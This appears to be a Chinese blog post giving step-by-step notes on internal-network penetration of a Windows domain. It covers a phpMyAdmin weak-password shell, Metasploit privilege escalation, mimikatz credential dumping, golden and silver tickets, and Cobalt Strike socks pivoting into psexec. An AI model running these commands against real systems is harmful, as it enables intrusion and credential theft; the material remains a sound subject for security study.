文章目錄

• 前言
• 域內主機有網
• • 攻擊流程
• 域內主機無網
• • 操作流程

前言

在滲透測試的過程中，拿下域內一臺主機以后，有時候內網的其他主機有網，有時候沒網，此時，如果有網我們就按常規的滲透測試即可，如果沒網我們就應該以該主機作為跳板，使用socks協議或其他辦法，從而實現與無網的主機進行通信

域內主機有網

攻擊流程

通過域環境webserver主機的外網WEB服務開啟到域控權限的獲取
假如已經獲取webserver權限：
0x01:

• 通過phpmyadmin弱口令getshell

0x02:

• msf生成 msf監聽 getsystem upload ‘/root/x64’ c:\test mimikatz
  privilege::debug sekurlsa::logonpasswords

0x03:

• 批處理wmicexec測試弱口令 29 31 32 IP存在

0x04：

• 獲取29 31 32權限 反彈msf getsystem

0x05

• 批處理wmicexec測試弱口令 21中標
• execute -f cmd.exe -H -i 0x06
• 導出所有hash 進行黃金白銀票據

域內主機無網

Msf

• 拿下weserver，發現有兩個網段，192.168.3.31 192.168.230.131
  假設192.168.230.131為外網，192.168.3.31為內網
• 又發現內網其他主機都沒有聯網，只有webserver聯網了。
• 此時，可以用webserver作為跳板，用cs開啟socks，并用msf

操作流程

#cobalt strike

• 啟動，監聽，生成，上線，提權
• cs啟動sockt4 生成監聽端口跳板，將setg Proxies
• socks4:192.168.230.133:xxxxx復制到msf

msfconsole

• 加載代理：setg Proxies socks4:192.168.230.133:xxxxx
• 攻擊模塊：ms17010 ms14068 smb psexec等
• use exploit/windows/smb/psexec

#自己綁定自己，就實現了無網探針

• set payload bind_tcp
• set smbuser administrator
• set smbpass admin!@#45
• 上傳mimikatz：upload ‘/root/x64’ c:\test
• mimikatz privilege::debug sekurlsa::logonpasswords

總結

以上是生活随笔為你收集整理的内网渗透-域内有网和无网的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。